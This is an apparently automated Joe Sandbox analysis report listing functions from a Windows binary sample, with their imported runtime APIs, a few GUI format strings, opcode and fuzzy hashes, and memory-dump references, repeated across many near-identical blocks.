Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: cd776186ab4a2a557464b29084a31b67cb617ff56af99281e7ece6197f8cbfa9
Instruction ID: 5d9331d1352085faebad4de95a63e30ecd7af91a4df95f246763c1f773c03e8b
Opcode Fuzzy Hash: cd776186ab4a2a557464b29084a31b67cb617ff56af99281e7ece6197f8cbfa9
Instruction Fuzzy Hash: 4F512332A1AB82A6FB55EF21E490228B3A5FF44F44F985935CE8D07754DF38E491E720

Function 00007FF735DB23A0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB23EE
memmove.VCRUNTIME140 ref: 00007FF735DB2404
memchr.VCRUNTIME140 ref: 00007FF735DB24A5
memchr.VCRUNTIME140 ref: 00007FF735DB24C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB25AE

Strings

], xrefs: 00007FF735DB2482
Window, xrefs: 00007FF735DB24DA

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memchr$freemallocmemmove
String ID: Window$]
API String ID: 3276875001-2892678728
Opcode ID: 700d930322d9ce77485cca36474c8dec97cefded9ecda2720f0ca6fa38871625
Instruction ID: 2af46a9e547f23442fdde934e9618fe7eb67e9392465debd99e90a1c3381cc49
Opcode Fuzzy Hash: 700d930322d9ce77485cca36474c8dec97cefded9ecda2720f0ca6fa38871625
Instruction Fuzzy Hash: 9D512422B2C687B0EB21AB16959437AE7D3AB55FC0FC84131DE4D07B88DE2CE542D361

Function 00007FF735DE9A30 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2A37), ref: 00007FF735DE9AC4
memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2A37), ref: 00007FF735DE9B08
memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2A37), ref: 00007FF735DE9B20
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF735DD2A37), ref: 00007FF735DE9BA8
memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2A37), ref: 00007FF735DE9BD5
memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2A37), ref: 00007FF735DE9BF0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE9C13

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: be9118b635c93c1d2169e4cff8661e2d38d0c490d4f23082b791273f7c39df30
Instruction ID: c6bde7ce52090e4db789597c4e0473efc006ef7f199a7a5c4181d8d244562e20
Opcode Fuzzy Hash: be9118b635c93c1d2169e4cff8661e2d38d0c490d4f23082b791273f7c39df30
Instruction Fuzzy Hash: 4A51D232A19B82A2EA18AF21D5842AD6360FB14FC4F944632DF6D07791DF78E1E5E350

Function 00007FF735DE8990 Relevance: 10.6, APIs: 7, Instructions: 133COMMON

Download Yara Rule

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8A23
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8A76
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8A9F
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8AC6
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8B0C
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8B13
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8B20

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 729925803-0
Opcode ID: ad752f3c27af0dea88d10ea897f2c9e857b8ae3bd7b7b1bc57956cfd2447523e
Instruction ID: 3c4a0f3b747db28ca07719e2ef9694d3ac978d91f9e221f8d2680ea4cc6d816d
Opcode Fuzzy Hash: ad752f3c27af0dea88d10ea897f2c9e857b8ae3bd7b7b1bc57956cfd2447523e
Instruction Fuzzy Hash: C6517122618A4292EB25DF19E5C5238E7A0FB85F95F95C631CE5E437A0CF3DD442A350

Function 00007FF735DE90A0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90CD
??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90E7
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9119
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9144
std::_Facet_Register.LIBCPMT ref: 00007FF735DE915D
??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE917C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE91A7

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 762505753-0
Opcode ID: 8d453049321c28120332f4843a549bea360398ac6f13708075c04a3396c00665
Instruction ID: 2af62fe597b38984849f5aafb26619ba97d8976b72e9cf6a12df5951af033d1a
Opcode Fuzzy Hash: 8d453049321c28120332f4843a549bea360398ac6f13708075c04a3396c00665
Instruction Fuzzy Hash: AB318426A19B43A1EB18AF11E884169B370FB88FD4F880631DB9E07768DF3CE441D710

Function 00007FF735DE8DC0 Relevance: 9.2, APIs: 6, Instructions: 178COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF735DE8E88

Part of subcall function 00007FF735DEAF64: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF735DE9935,?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DEAF7E

memset.VCRUNTIME140 ref: 00007FF735DE8F0D
DeviceIoControl.KERNEL32 ref: 00007FF735DE8FE8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DE904A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE9085
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE9091

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 4066468686-0
Opcode ID: 59cd26df68e075756a438300fcd6a13996211d2d9c7245ee1d7572b30236f00a
Instruction ID: db3963a4441066795ed842a2858c72c13707b31fc760479b67034bdf5a48eddc
Opcode Fuzzy Hash: 59cd26df68e075756a438300fcd6a13996211d2d9c7245ee1d7572b30236f00a
Instruction Fuzzy Hash: 6F71B532A19B8295EA25EB15E084369F3A0FB84FA0F944335EAAD03BD5CF7DD441D750

Function 00007FF735DB2860 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 131stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140 ref: 00007FF735DB29D7

Strings

[%s][%s], xrefs: 00007FF735DB29E1
Size=%d,%d, xrefs: 00007FF735DB2A1E
###, xrefs: 00007FF735DB29CD
Pos=%d,%d, xrefs: 00007FF735DB2A01
Collapsed=%d, xrefs: 00007FF735DB2A3A

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: strstr
String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
API String ID: 1392478783-2972057365
Opcode ID: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
Instruction ID: af536bf91b9a50d0d6f903a69d33a08e2b1afb07bd0f55e72738e2520925a1d5
Opcode Fuzzy Hash: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
Instruction Fuzzy Hash: BC51EF32A28683E6DB15EF12E481479B7A2FB84F80F858135DA9D47758DF3CE441DB60

Function 00007FF735DE9880 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DE996E
memmove.VCRUNTIME140(?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DE997C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DE99B5
memmove.VCRUNTIME140(?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DE99BF
memmove.VCRUNTIME140(?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DE99CD
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE99FF

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: c9b30169ca998f5a49f008c88493139130241357a60e0c52ee35b2ed4dbe3de6
Instruction ID: 5918b051310b4a5d123322f4acd4831b88468b5b9d153015b5a3e432d20fa1f6
Opcode Fuzzy Hash: c9b30169ca998f5a49f008c88493139130241357a60e0c52ee35b2ed4dbe3de6
Instruction Fuzzy Hash: C041F462B29A47A4EE18AB12A9843BDE261FB44FD4F944231DF9E07785DE3CD081A310

Function 00007FF735DE9EF0 Relevance: 9.1, APIs: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9FDA
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9FE9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DEA01D
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DEA024
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DEA033
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DEA05E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 074fc4f508f104118e3b30d8110de5020d8f32a2eccf9e0c16eeaac25f808de9
Instruction ID: 1d57c93280cd5d0ec2161e6766eb48f20aeba8687c5d9b0ba3aaed398c5d2821
Opcode Fuzzy Hash: 074fc4f508f104118e3b30d8110de5020d8f32a2eccf9e0c16eeaac25f808de9
Instruction Fuzzy Hash: 9241B262B29743A5EE19BB11A1842ACE361EB44FD0FD44631DE9D077D9DE3CE081E320

Function 00007FF735DE96F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF735DE97DD
memset.VCRUNTIME140 ref: 00007FF735DE97EA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DE9823
memmove.VCRUNTIME140 ref: 00007FF735DE982D
memset.VCRUNTIME140 ref: 00007FF735DE983A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE986F

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2171940698-0
Opcode ID: 60ecac6ef8b9f1876bf45d7bd00dbe9412167d2aaf588b70f8101a5b62ee08b4
Instruction ID: f79b592ca78eb4bf31d2a86e69363aecc3c82a0fb9a371e907db810e6a83c656
Opcode Fuzzy Hash: 60ecac6ef8b9f1876bf45d7bd00dbe9412167d2aaf588b70f8101a5b62ee08b4
Instruction Fuzzy Hash: F141E662B2AA47A5EE18FF22A184269E3A5EB45FD4F844231DF9E077D5DE3CD0419320

Function 00007FF735DE7820 Relevance: 9.1, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE786C
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE7908
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE7927
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE798B
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE7994

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
String ID:
API String ID: 915423947-0
Opcode ID: 7592ee7a7fd9520c02612d7c9c7bba5e713443b708da033a884a3b64f97d5f89
Instruction ID: a4faa7015432dc3b9aaab74f8bfdc46e9935aa7b3e057ade98eebff8d7e203db
Opcode Fuzzy Hash: 7592ee7a7fd9520c02612d7c9c7bba5e713443b708da033a884a3b64f97d5f89
Instruction Fuzzy Hash: 0041D222B14BC7A5FB18AB65E4803A9A350EB44FA4F944231EB2C077D6DF38E891D351

Function 00007FF735DE7CF0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF735DE7D2A
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7D47
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DE7D70
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF735DE7DBB

Part of subcall function 00007FF735DE90A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90CD
Part of subcall function 00007FF735DE90A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90E7
Part of subcall function 00007FF735DE90A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9119
Part of subcall function 00007FF735DE90A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9144
Part of subcall function 00007FF735DE90A0: std::_Facet_Register.LIBCPMT ref: 00007FF735DE915D
Part of subcall function 00007FF735DE90A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE917C

?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF735DE7DD0
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7DE7

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3911317180-0
Opcode ID: cb1c486c5891193a5e828c942d37560bccd97b3465428ccdbbd7e96aa0c3771a
Instruction ID: 0c76ed498abb0ac49996cf8e28c7fd1ace5c06b67f4d4524119685f2592cdd66
Opcode Fuzzy Hash: cb1c486c5891193a5e828c942d37560bccd97b3465428ccdbbd7e96aa0c3771a
Instruction Fuzzy Hash: 2C318D32629B8291EB98EF25E884329B3A4FB48F88F440135DE8D47B58DF3CD455D750

Function 00007FF735DD7150 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF735DD71AF

Part of subcall function 00007FF735DEB9B0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF735DD71B4), ref: 00007FF735DEB9B4
Part of subcall function 00007FF735DEB9B0: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF735DD71B4), ref: 00007FF735DEB9C3

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD732D

Part of subcall function 00007FF735DE9580: memmove.VCRUNTIME140(?,00000000,00000004,?,00007FF735DD72FA), ref: 00007FF735DE9662

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD737B

Strings

: ", xrefs: 00007FF735DD726A
", ", xrefs: 00007FF735DD729D

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememmove
String ID: ", "$: "
API String ID: 1229626011-747220369
Opcode ID: 66f70a2130dd12123222d8d70e99f143ef02b8dd501f163f7f5f328fcc77e5c4
